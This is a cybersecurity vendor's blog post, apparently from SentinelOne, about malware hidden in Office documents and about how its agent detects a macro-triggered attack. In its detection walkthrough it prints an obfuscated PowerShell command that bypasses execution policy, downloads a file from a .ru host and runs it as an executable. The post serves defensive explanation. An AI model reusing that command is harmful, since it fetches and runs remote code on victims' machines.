The Latest News in Cybersecurity Right to Your Inbox Thank you!

 Malware Hidden in Documents are also Fileless-based Attacks

 Beyond the fileless-based attack that uses system files to run malicious code, another type of attack that is common and considered fileless is malware hidden within documents.
 Although such data files are not allowed to run code, there are vulnerabilities in Microsoft Office and PDF readers that adversaries can exploit to obtain code execution.
 For example, an infected document could trigger a malicious PowerShell command.
-There are also a few built-in functionalities that allow code execution within documents, like macros and DDE.
+There are also a few built-in functionalities that allow code execution within documents, like macros and DDE attack.

 Detection and Mitigation Walkthrough

 Let’s walk through a flow where the user has received a Word document via encrypted email.
 The user knows the sender and, therefore, downloads the document to his Desktop and opens it.
 Once he opens the file, he gets the following:

 Once “Yes” is clicked, the attack is rolling.
 Let’s see what the SentinelOne agent detects (running in Detect mode for this example).

 The administrator can examine exactly how each and every element involved in this story contributed to the attack.

 SentinelOne displays the exact command line invoking the PowerShell command:

 -ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:\Users\admin\AppData\Roaming.exE');START-proceSS 'C:\Users\admin\AppData\Roaming.exE'

 In a real-life scenario, the SentinelOne agent immediately mitigates the issue.
 This happens automatically, without the need for the administrator to take any action.
 The administrator is notified by SMS, SIEM or email.